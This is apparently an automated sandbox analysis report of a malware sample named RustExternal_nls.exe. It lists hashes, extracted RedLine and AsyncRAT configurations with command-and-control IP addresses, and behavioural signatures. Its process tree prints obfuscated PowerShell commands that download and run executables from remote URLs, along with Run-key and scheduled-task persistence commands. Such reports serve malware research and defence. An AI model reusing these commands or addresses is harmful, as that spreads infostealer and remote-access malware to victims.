Resubmissions

10-03-2023 22:01

230310-1xerdshc7x 7

14-02-2023 16:10

230214-tmg1faee72 7

31-01-2023 07:47

230131-jmw49afe54 10

26-12-2022 21:03

221226-zv36jaha4x 10

24-12-2022 19:27

221224-x6gessdf7z 10

13-12-2022 03:51

221213-eenexsgc4v 10

12-12-2022 11:33

221212-npbnjsbc28 10

06-12-2022 06:29

221206-g8658sca54 8

05-12-2022 06:17

221205-g19ldsgh7x 10

Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-01-2023 07:47

General

  • Target

    RustExternal_nls.exe

  • Size

    658KB

  • MD5

    1ab8dbca5e2bba39723f00907d266de7

  • SHA1

    729cb808637568f20ac886b3fac5f3cf5ff01dee

  • SHA256

    c6dda31fa6cb4ce140f62c9ce604672fa4a9ba5d1792f2d77f3cfcb43b3227ac

  • SHA512

    d1a31848eb9b683793afd36031ef8078ff962c2526272782cf2fca8db11afb71643a46b9ad6bce3ba8dba1b638672205726f6e96c7dd3e887228a2368ec08081

  • SSDEEP

    12288:3oSO5i2eVUIvybKcEz4MM7S9HdKINesX7j6p9PI8GS0oN2:3ouTVUIvtH4H7aLeO23gRoY

Malware Config

Extracted

Family

redline

Botnet

ff

C2

51.103.208.104:53200

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WHostProjess

C2

95.70.151.185:8805

Mutex

WHostProjess

Attributes
  • delay

    3

  • install

    false

  • install_file

    WHostProjess

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

SecurityHealthService

C2

20.4.6.16:43521

Mutex

SecurityHealthService

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealthService

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

WindoosDGuard

C2

20.4.6.16:43521

Mutex

WindoosDGuard

Attributes
  • delay

    3

  • install

    false

  • install_file

    WindoosDGuard

  • install_folder

    %AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

DefenderSmartScren

C2

217.64.31.3:8437

Mutex

DefenderSmartScren

Attributes
  • delay

    3

  • install

    false

  • install_file

    SecurityHealtheurvice.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Async RAT payload 4 IoCs
  • Blocklisted process makes network request 12 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe
    "C:\Users\Admin\AppData\Local\Temp\RustExternal_nls.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4720
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE
        "C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4964
        • C:\Windows\system32\cmd.exe
          "cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4764
          • C:\Users\Admin\AppData\Local\Temp\0.exe
            C:\Users\Admin\AppData\Local\Temp\0.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:788
            • C:\Windows\system32\cmd.exe
              "cmd" /C C:\Users\Admin\AppData\Local\Temp\CH1cxSaG6k.exe
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:100
              • C:\Users\Admin\AppData\Local\Temp\CH1cxSaG6k.exe
                C:\Users\Admin\AppData\Local\Temp\CH1cxSaG6k.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3376
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  #cmd
                  8⤵
                    PID:3024
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    #cmd
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4500
              • C:\Windows\system32\cmd.exe
                "cmd" /C C:\Users\Admin\AppData\Local\Temp\i8cucIn10z.exe
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:5084
                • C:\Users\Admin\AppData\Local\Temp\i8cucIn10z.exe
                  C:\Users\Admin\AppData\Local\Temp\i8cucIn10z.exe
                  7⤵
                  • Executes dropped EXE
                  PID:4384
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAegBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAyADYAMwAzADkAMAA5ADkAMAAzADYANgAvAFcASABvAHMAdAAuAGUAeABlACcALAAgADwAIwB0AGMAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AagB3ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAcAB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAdgBrAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgByAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHQAegBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAHgAagB1ACMAPgA="
                    8⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:820
                    • C:\Users\Admin\AppData\Roaming\2.exe
                      "C:\Users\Admin\AppData\Roaming\2.exe"
                      9⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4640
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADQANgA5ADQANQA3ADEANQAwADAAMgA0AC8AbABjAG8AbQBwAGwAYwBtAHAAbwAuAGUAeABlACcALAAgADwAIwB5AGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AawB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAYQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMQAuAGUAeABlACcAKQApADwAIwBqAHYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGwAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbAB2AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAxAC4AZQB4AGUAJwApADwAIwB5AG4AdgAjAD4A"
                    8⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4460
                    • C:\Users\Admin\AppData\Roaming\11.exe
                      "C:\Users\Admin\AppData\Roaming\11.exe"
                      9⤵
                      • Executes dropped EXE
                      PID:2624
              • C:\Windows\system32\cmd.exe
                "cmd" /C C:\Users\Admin\AppData\Local\Temp\cpFkbB2rR8.exe
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:5044
                • C:\Users\Admin\AppData\Local\Temp\cpFkbB2rR8.exe
                  C:\Users\Admin\AppData\Local\Temp\cpFkbB2rR8.exe
                  7⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:396
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADAANgA5ADQANAA2ADQANwAxADkAMwAvAGwAbABpAHAAZQBkAGUAZQBkAGQALgBlAHgAZQAnACwAIAA8ACMAYQB6AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAHoAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGoAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAHkAcgBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGoAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwBqAHMAcwAjAD4A"
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3000
                    • C:\Users\Admin\AppData\Roaming\3.exe
                      "C:\Users\Admin\AppData\Roaming\3.exe"
                      9⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4124
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        10⤵
                          PID:3376
                • C:\Windows\system32\cmd.exe
                  "cmd" /C C:\Users\Admin\AppData\Local\Temp\CnzZwjyRSa.exe
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3560
                  • C:\Users\Admin\AppData\Local\Temp\CnzZwjyRSa.exe
                    C:\Users\Admin\AppData\Local\Temp\CnzZwjyRSa.exe
                    7⤵
                      PID:4640
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAbgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADEANwAzADkANgA4ADQAOAA3ADUAMQAvAFMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcALAAgADwAIwBpAHIAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAeABmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAdgBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAKQA8ACMAcQBmAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBiAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAeQByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAPAAjAGIAeABpACMAPgA="
                        8⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:808
                        • C:\Users\Admin\AppData\Roaming\4.exe
                          "C:\Users\Admin\AppData\Roaming\4.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4232
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'
                            10⤵
                            • Adds Run key to start application
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2004
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                            10⤵
                            • Blocklisted process makes network request
                            • Checks computer location settings
                            PID:3000
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                              11⤵
                              • Creates scheduled task(s)
                              PID:3364
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            #cmd
                            10⤵
                              PID:3892
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WHost' -Value '"C:\Users\Admin\AppData\Roaming\WHost\WHost.exe"' -PropertyType 'String'
                          8⤵
                          • Adds Run key to start application
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4748
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd" /C schtasks /create /tn \WHost /tr "C:\Users\Admin\AppData\Roaming\WHost\WHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                          8⤵
                            PID:4220
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /tn \WHost /tr "C:\Users\Admin\AppData\Roaming\WHost\WHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                              9⤵
                              • Creates scheduled task(s)
                              PID:1260
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            #cmd
                            8⤵
                              PID:2768
                        • C:\Windows\system32\cmd.exe
                          "cmd" /C C:\Users\Admin\AppData\Local\Temp\kQRSMn82iv.exe
                          6⤵
                            PID:2204
                            • C:\Users\Admin\AppData\Local\Temp\kQRSMn82iv.exe
                              C:\Users\Admin\AppData\Local\Temp\kQRSMn82iv.exe
                              7⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of WriteProcessMemory
                              PID:2328
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcwBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADMANAA2ADMANQA0ADQAMgAxADcANgAvAFcAaQBuAEYAbwByAG0ALgBlAHgAZQAnACwAIAA8ACMAeQB4AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAHYAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHYAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApACkAPAAjAGIAbQBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHgAegBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAGkAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApADwAIwB6AHIAcwAjAD4A"
                                8⤵
                                • Blocklisted process makes network request
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2248
                                • C:\Users\Admin\AppData\Roaming\5.exe
                                  "C:\Users\Admin\AppData\Roaming\5.exe"
                                  9⤵
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious use of SetThreadContext
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3672
                                  • C:\Users\Admin\AppData\Roaming\5.exe
                                    "C:\Users\Admin\AppData\Roaming\5.exe"
                                    10⤵
                                    • Executes dropped EXE
                                    PID:1292
                          • C:\Windows\system32\cmd.exe
                            "cmd" /C C:\Users\Admin\AppData\Local\Temp\dEXjaVGN7q.exe
                            6⤵
                              PID:2432
                              • C:\Users\Admin\AppData\Local\Temp\dEXjaVGN7q.exe
                                C:\Users\Admin\AppData\Local\Temp\dEXjaVGN7q.exe
                                7⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:4756
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAYwB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADYANQAxADkAOQAzADMANQA1ADUANQAvAG0AcABkAGkAaQBpAGwAcABvAGUALgBlAHgAZQAnACwAIAA8ACMAYgBnAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHEAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGQAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApACkAPAAjAG0AcgB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAdgBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGYAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApADwAIwBtAHIAYwAjAD4A"
                                  8⤵
                                  • Blocklisted process makes network request
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4896
                                  • C:\Users\Admin\AppData\Roaming\6.exe
                                    "C:\Users\Admin\AppData\Roaming\6.exe"
                                    9⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3716
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                      10⤵
                                        PID:4408
                              • C:\Windows\system32\cmd.exe
                                "cmd" /C C:\Users\Admin\AppData\Local\Temp\wPN0AWXX3v.exe
                                6⤵
                                  PID:1896
                                  • C:\Users\Admin\AppData\Local\Temp\wPN0AWXX3v.exe
                                    C:\Users\Admin\AppData\Local\Temp\wPN0AWXX3v.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    PID:4260
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAaQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADcAMQA0ADgANgA2ADAAMQAyADUANgAvAFcAaQBuAGQAbwB3AHMARABpAHIAZQB4AHQALgBlAHgAZQAnACwAIAA8ACMAdQBkAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAGwAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAGcAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApACkAPAAjAGIAeQBlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AZABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHoAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA3AC4AZQB4AGUAJwApADwAIwB5AGoAcQAjAD4A"
                                      8⤵
                                      • Blocklisted process makes network request
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1320
                                      • C:\Users\Admin\AppData\Roaming\7.exe
                                        "C:\Users\Admin\AppData\Roaming\7.exe"
                                        9⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        PID:2316
                                • C:\Windows\system32\cmd.exe
                                  "cmd" /C C:\Users\Admin\AppData\Local\Temp\m5TUWHXXb5.exe
                                  6⤵
                                    PID:2600
                                    • C:\Users\Admin\AppData\Local\Temp\m5TUWHXXb5.exe
                                      C:\Users\Admin\AppData\Local\Temp\m5TUWHXXb5.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:3764
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAawBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA1ADEAOAAyADEAMQA2ADAANAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAG0AagBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBlAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBsAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQApADwAIwBmAHMAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AGoAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBpAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQA8ACMAYgBpAHAAIwA+AA=="
                                        8⤵
                                        • Blocklisted process makes network request
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2832
                                        • C:\Users\Admin\AppData\Roaming\8.exe
                                          "C:\Users\Admin\AppData\Roaming\8.exe"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:4828
